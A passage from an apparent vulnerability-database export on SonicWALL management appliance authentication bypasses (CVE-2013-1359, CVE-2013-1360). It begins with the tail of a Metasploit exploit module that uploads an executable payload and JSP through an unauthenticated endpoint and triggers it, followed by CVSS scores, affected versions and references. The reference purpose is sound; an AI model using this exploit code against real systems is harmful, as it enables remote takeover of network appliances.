\u0027search\u0027,\n\t\t\t\t\t\u0027item\u0027 =\u003e \u0027application_log\u0027,\n\t\t\t\t\t\u0027criteria\u0027 =\u003e \u0027*.*\u0027,\n\t\t\t\t\t\u0027width\u0027 =\u003e \u0027500\u0027\n\t\t\t\t}\n\t\t\t})\n\n\t\tif res and res.code == 200 and res.body =~ /VALUE=\"(.*)logs/\n\t\t\treturn $1\n\t\tend\n\n\t\treturn nil\n\tend\n\n\tdef upload_file(location, filename, contents)\n\t\tpost_data = Rex::MIME::Message.new\n\t\tpost_data.add_part(\"file_system\", nil, nil, \"form-data; name=\\\"action\\\"\")\n\t\tpost_data.add_part(\"uploadFile\", nil, nil, \"form-data; name=\\\"task\\\"\")\n\t\tpost_data.add_part(location, nil, nil, \"form-data; name=\\\"searchFolder\\\"\")\n\t\tpost_data.add_part(contents, \"application/octet-stream\", nil, \"form-data; name=\\\"uploadFilename\\\"; filename=\\\"#{filename}\\\"\")\n\n\t\tdata = post_data.to_s\n\t\tdata.gsub!(/\\r\\n\\r\\n--_Part/, \"\\r\\n--_Part\")\n\n\t\tres = send_request_cgi(\n\t\t\t{\n\t\t\t\t\u0027uri\u0027 =\u003e \"#{@uri}appliance/applianceMainPage?skipSessionCheck=1\",\n\t\t\t\t\u0027method\u0027 =\u003e \u0027POST\u0027,\n\t\t\t\t\u0027data\u0027 =\u003e data,\n\t\t\t\t\u0027ctype\u0027 =\u003e \"multipart/form-data; boundary=#{post_data.bound}\",\n\t\t\t\t\u0027headers\u0027 =\u003e\n\t\t\t\t\t{\n\t\t\t\t\t\t\u0027TE\u0027 =\u003e \"deflate,gzip;q=0.3\",\n\t\t\t\t\t},\n\t\t\t\t\u0027connection\u0027 =\u003e \u0027TE, close\u0027\n\t\t\t})\n\n\t\tif res and res.code == 200 and res.body.empty?\n\t\t\treturn true\n\t\telse\n\t\t\treturn false\n\t\tend\n\tend\n\n\tdef check\n\t\t@peer = \"#{rhost}:#{rport}\"\n\t\t@uri = normalize_uri(target_uri.path)\n\t\t@uri \u003c\u003c \u0027/\u0027 if @uri[-1,1] != \u0027/\u0027\n\n\t\tif get_install_path.nil?\n\t\t\treturn Exploit::CheckCode::Safe\n\t\tend\n\n\t\treturn Exploit::CheckCode::Vulnerable\n\tend\n\n\tdef exploit\n\t\t@peer = \"#{rhost}:#{rport}\"\n\t\t@uri = normalize_uri(target_uri.path)\n\t\t@uri \u003c\u003c \u0027/\u0027 if @uri[-1,1] != \u0027/\u0027\n\n\t\t# Get Tomcat installation path\n\t\tprint_status(\"#{@peer} - Retrieving Tomcat installation path...\")\n\t\tinstall_path = get_install_path\n\n\t\tif install_path.nil?\n\t\t\tfail_with(Exploit::Failure::NotVulnerable, \"#{@peer} - Unable to retrieve the Tomcat installation path\")\n\t\tend\n\n\t\tprint_good(\"#{@peer} - Tomcat installed on #{install_path}\")\n\n\t\tif target[\u0027Platform\u0027] == \"linux\"\n\t\t\t@location = \"#{install_path}webapps/appliance/\"\n\t\telsif target[\u0027Platform\u0027] == \"win\"\n\t\t\t@location = \"#{install_path}webapps\\\\appliance\\\\\"\n\t\tend\n\n\n\t\t# Upload the JSP and the raw payload\n\t\t@jsp_name = rand_text_alphanumeric(8+rand(8))\n\n\t\tjspraw = generate_jsp\n\n\t\t# Specify the payload in hex as an extra file.. \n\t\tpayload_hex = payload.encoded_exe.unpack(\u0027H*\u0027)[0]\n\n\t\tprint_status(\"#{@peer} - Uploading the payload\")\n\n\t\tif upload_file(@location, \"#{@var_hexfile}.txt\", payload_hex)\n\t\t\tprint_good(\"#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt\")\n\t\telse\n\t\t\tfail_with(Exploit::Failure::NotVulnerable, \"#{@peer} - Error uploading the Payload\")\n\t\tend\n\n\t\tprint_status(\"#{@peer} - Uploading the payload\")\n\n\t\tif upload_file(@location, \"#{@jsp_name}.jsp\", jspraw)\n\t\t\tprint_good(\"#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp\")\n\t\telse\n\t\t\tfail_with(Exploit::Failure::NotVulnerable, \"#{@peer} - Error uploading the jsp\")\n\t\tend\n\n\t\tprint_status(\"Triggering payload at \u0027#{@uri}#{@jsp_name}.jsp\u0027 ...\")\n\t\tres = send_request_cgi(\n\t\t\t{\n\t\t\t\t\u0027uri\u0027 =\u003e \"#{@uri}appliance/#{@jsp_name}.jsp\",\n\t\t\t\t\u0027method\u0027 =\u003e \u0027GET\u0027\n\t\t\t})\n\n\t\tif res and res.code != 200\n\t\t\tprint_warning(\"#{@peer} - Error triggering the payload\")\n\t\tend\n\n\t\tregister_files_for_cleanup(\"#{@location}#{@var_hexfile}.txt\")\n\t\tregister_files_for_cleanup(\"#{@location}#{@jsp_name}.jsp\")\n\tend\n\nend\n", "sources": [ { "db": "NVD", "id": "CVE-2013-1359" }, { "db": "JVNDB", "id": "JVNDB-2013-007224" }, { "db": "BID", "id": "57445" }, { "db": "VULHUB", "id": "VHN-61361" }, { "db": "PACKETSTORM", "id": "119808" } ], "trust": 2.07 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-61361", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-61361" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-1359", "trust": 2.9 }, { "db": "BID", "id": "57445", "trust": 2.0 }, { "db": "SECTRACK", "id": "1028007", "trust": 1.7 }, { "db": "EXPLOIT-DB", "id": "24204", "trust": 1.7 }, { "db": "EXPLOIT-DB", "id": "24322", "trust": 1.7 }, { "db": "JVNDB", "id": "JVNDB-2013-007224", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201301-377", "trust": 0.7 }, { "db": "PACKETSTORM", "id": "119808", "trust": 0.2 }, { "db": "SEEBUG", "id": "SSVID-77937", "trust": 0.1 }, { "db": "SEEBUG", "id": "SSVID-78054", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-61361", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-61361" }, { "db": "BID", "id": "57445" }, { "db": "JVNDB", "id": "JVNDB-2013-007224" }, { "db": "PACKETSTORM", "id": "119808" }, { "db": "NVD", "id": "CVE-2013-1359" }, { "db": "CNNVD", "id": "CNNVD-201301-377" } ] }, "id": "VAR-202002-0532", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-61361" } ], "trust": 0.01 }, "last_update_date": "2023-12-18T12:49:50.845000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "https://www.sonicwall.com/" }, { "title": "Multiple SonicWALL Product verification bypass fixes", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=108920" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-007224" }, { "db": "CNNVD", "id": "CNNVD-201301-377" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-287", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-61361" }, { "db": "JVNDB", "id": "JVNDB-2013-007224" }, { "db": "NVD", "id": "CVE-2013-1359" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.5, "url": "https://seclists.org/fulldisclosure/2013/jan/125" }, { "trust": 1.7, "url": "http://www.exploit-db.com/exploits/24204" }, { "trust": 1.7, "url": "http://www.exploit-db.com/exploits/24322" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/57445" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1028007" }, { "trust": 1.7, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81367" }, { "trust": 1.7, "url": "https://fortiguard.com/encyclopedia/ips/35264/multiple-sonicwall-products-authentication-bypass-vulns" }, { "trust": 1.7, "url": "https://packetstormsecurity.com/files/author/7547/" }, { "trust": 1.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1359" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1359" }, { "trust": 0.1, "url": "http://metasploit.com/" } ], "sources": [ { "db": "VULHUB", "id": "VHN-61361" }, { "db": "JVNDB", "id": "JVNDB-2013-007224" }, { "db": "PACKETSTORM", "id": "119808" }, { "db": "NVD", "id": "CVE-2013-1359" }, { "db": "CNNVD", "id": "CNNVD-201301-377" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-61361" }, { "db": "BID", "id": "57445" }, { "db": "JVNDB", "id": "JVNDB-2013-007224" }, { "db": "PACKETSTORM", "id": "119808" }, { "db": "NVD", "id": "CVE-2013-1359" }, { "db": "CNNVD", "id": "CNNVD-201301-377" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-02-11T00:00:00", "db": "VULHUB", "id": "VHN-61361" }, { "date": "2013-01-17T00:00:00", "db": "BID", "id": "57445" }, { "date": "2020-03-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-007224" }, { "date": "2013-01-25T02:58:51", "db": "PACKETSTORM", "id": "119808" }, { "date": "2020-02-11T17:15:11.593000", "db": "NVD", "id": "CVE-2013-1359" }, { "date": "2013-01-21T00:00:00", "db": "CNNVD", "id": "CNNVD-201301-377" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-02-14T00:00:00", "db": "VULHUB", "id": "VHN-61361" }, { "date": "2013-01-24T19:00:00", "db": "BID", "id": "57445" }, { "date": "2020-03-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-007224" }, { "date": "2020-02-14T18:13:49.477000", "db": "NVD", "id": "CVE-2013-1359" }, { "date": "2020-05-26T00:00:00", "db": "CNNVD", "id": "CNNVD-201301-377" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201301-377" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural SonicWALL Product authentication vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-007224" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "authorization issue", "sources": [ { "db": "CNNVD", "id": "CNNVD-201301-377" } ], "trust": 0.6 } }
var-202002-0533
Vulnerability from variot
An Authentication Bypass vulnerability exists in DELL SonicWALL Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0, Analyzer 7.0, Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, and 6.0 via a crafted request to the SGMS interface, which could let a remote malicious user obtain administrative access. plural SonicWALL The product contains an authentication vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Attackers can exploit this issue to gain administrative access to the web interface that could fully compromise the system. The following versions are affected: GMS/Analyzer/UMA 7.0.x GMS/ViewPoint/UMA 6.0.x GMS/ViewPoint/UMA 5.1.x GMS/ViewPoint 5.0.x GMS/ViewPoint 4.1.x. SonicWALL is a full-featured Internet security appliance designed specifically for large networks with ever-growing VPN needs. Authorization vulnerabilities exist in several DELL SonicWALL products
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202002-0533", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "analyzer", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "7.0" }, { "model": "global management system", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "4.1" }, { "model": "global management system", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "5.0" }, { "model": "global management system", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "5.1" }, { "model": "global management system", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "6.0" }, { "model": "global management system", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "7.0" }, { "model": "universal management appliance", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "5.1" }, { "model": "universal management appliance", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "6.0" }, { "model": "universal management appliance", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "7.0" }, { "model": "viewpoint", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "4.1" }, { "model": "viewpoint", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "5.0" }, { "model": "viewpoint", "scope": "eq", "trust": 1.8, "vendor": "sonicwall", "version": "6.0" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-007212" }, { "db": "NVD", "id": "CVE-2013-1360" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sonicwall:analyzer:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:4.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:5.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:global_management_system:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:universal_management_appliance:5.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:universal_management_appliance:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:universal_management_appliance:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:viewpoint:4.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:viewpoint:5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sonicwall:viewpoint:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2013-1360" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Nikolas Sotiriu", "sources": [ { "db": "BID", "id": "57446" }, { "db": "CNNVD", "id": "CNNVD-201301-376" } ], "trust": 0.9 }, "cve": "CVE-2013-1360", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Complete", "baseScore": 10.0, "confidentialityImpact": "Complete", "exploitabilityScore": null, "id": "JVNDB-2013-007212", "impactScore": null, "integrityImpact": "Complete", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-61362", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 9.8, "baseSeverity": "Critical", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "JVNDB-2013-007212", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2013-1360", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "JVNDB-2013-007212", "trust": 0.8, "value": "Critical" }, { "author": "CNNVD", "id": "CNNVD-201301-376", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-61362", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-61362" }, { "db": "JVNDB", "id": "JVNDB-2013-007212" }, { "db": "NVD", "id": "CVE-2013-1360" }, { "db": "CNNVD", "id": "CNNVD-201301-376" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "An Authentication Bypass vulnerability exists in DELL SonicWALL Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0, Analyzer 7.0, Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, and 6.0 via a crafted request to the SGMS interface, which could let a remote malicious user obtain administrative access. plural SonicWALL The product contains an authentication vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. \nAttackers can exploit this issue to gain administrative access to the web interface that could fully compromise the system. \nThe following versions are affected:\nGMS/Analyzer/UMA 7.0.x\nGMS/ViewPoint/UMA 6.0.x\nGMS/ViewPoint/UMA 5.1.x\nGMS/ViewPoint 5.0.x\nGMS/ViewPoint 4.1.x. SonicWALL is a full-featured Internet security appliance designed specifically for large networks with ever-growing VPN needs. Authorization vulnerabilities exist in several DELL SonicWALL products", "sources": [ { "db": "NVD", "id": "CVE-2013-1360" }, { "db": "JVNDB", "id": "JVNDB-2013-007212" }, { "db": "BID", "id": "57446" }, { "db": "VULHUB", "id": "VHN-61362" } ], "trust": 1.98 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-61362", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-61362" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-1360", "trust": 2.8 }, { "db": "SECTRACK", "id": "1028007", "trust": 2.5 }, { "db": "BID", "id": "57446", "trust": 2.0 }, { "db": "EXPLOIT-DB", "id": "24203", "trust": 1.7 }, { "db": "JVNDB", "id": "JVNDB-2013-007212", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201301-376", "trust": 0.7 }, { "db": "SEEBUG", "id": "SSVID-77936", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "119639", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-61362", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-61362" }, { "db": "BID", "id": "57446" }, { "db": "JVNDB", "id": "JVNDB-2013-007212" }, { "db": "NVD", "id": "CVE-2013-1360" }, { "db": "CNNVD", "id": "CNNVD-201301-376" } ] }, "id": "VAR-202002-0533", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-61362" } ], "trust": 0.01 }, "last_update_date": "2023-12-18T12:49:50.816000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "https://www.sonicwall.com/" }, { "title": "Multiple SonicWALL Product verification bypass fixes", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=108874" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-007212" }, { "db": "CNNVD", "id": "CNNVD-201301-376" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-287", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-61362" }, { "db": "JVNDB", "id": "JVNDB-2013-007212" }, { "db": "NVD", "id": "CVE-2013-1360" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "http://archives.neohapsis.com/archives/bugtraq/2013-01/0075.html" }, { "trust": 1.7, "url": "http://www.exploit-db.com/exploits/24203" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/57446" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1028007" }, { "trust": 1.7, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81366" }, { "trust": 1.7, "url": "https://packetstormsecurity.com/files/cve/cve-2013-1360" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1360" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1360" }, { "trust": 0.8, "url": "https://securitytracker.com/id/1028007" } ], "sources": [ { "db": "VULHUB", "id": "VHN-61362" }, { "db": "JVNDB", "id": "JVNDB-2013-007212" }, { "db": "NVD", "id": "CVE-2013-1360" }, { "db": "CNNVD", "id": "CNNVD-201301-376" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-61362" }, { "db": "BID", "id": "57446" }, { "db": "JVNDB", "id": "JVNDB-2013-007212" }, { "db": "NVD", "id": "CVE-2013-1360" }, { "db": "CNNVD", "id": "CNNVD-201301-376" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-02-11T00:00:00", "db": "VULHUB", "id": "VHN-61362" }, { "date": "2013-01-17T00:00:00", "db": "BID", "id": "57446" }, { "date": "2020-02-27T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-007212" }, { "date": "2020-02-11T16:15:12.227000", "db": "NVD", "id": "CVE-2013-1360" }, { "date": "2013-01-21T00:00:00", "db": "CNNVD", "id": "CNNVD-201301-376" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-02-13T00:00:00", "db": "VULHUB", "id": "VHN-61362" }, { "date": "2013-01-17T00:00:00", "db": "BID", "id": "57446" }, { "date": "2020-02-27T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-007212" }, { "date": "2020-02-13T14:12:06.497000", "db": "NVD", "id": "CVE-2013-1360" }, { "date": "2020-05-26T00:00:00", "db": "CNNVD", "id": "CNNVD-201301-376" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201301-376" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural SonicWALL Product authentication vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-007212" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "authorization issue", "sources": [ { "db": "CNNVD", "id": "CNNVD-201301-376" } ], "trust": 0.6 } }
cve-2013-1360
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securitytracker.com/id/1028007 | x_refsource_MISC | |
http://www.securityfocus.com/bid/57446 | x_refsource_MISC | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/81366 | x_refsource_MISC | |
http://www.exploit-db.com/exploits/24203 | x_refsource_MISC | |
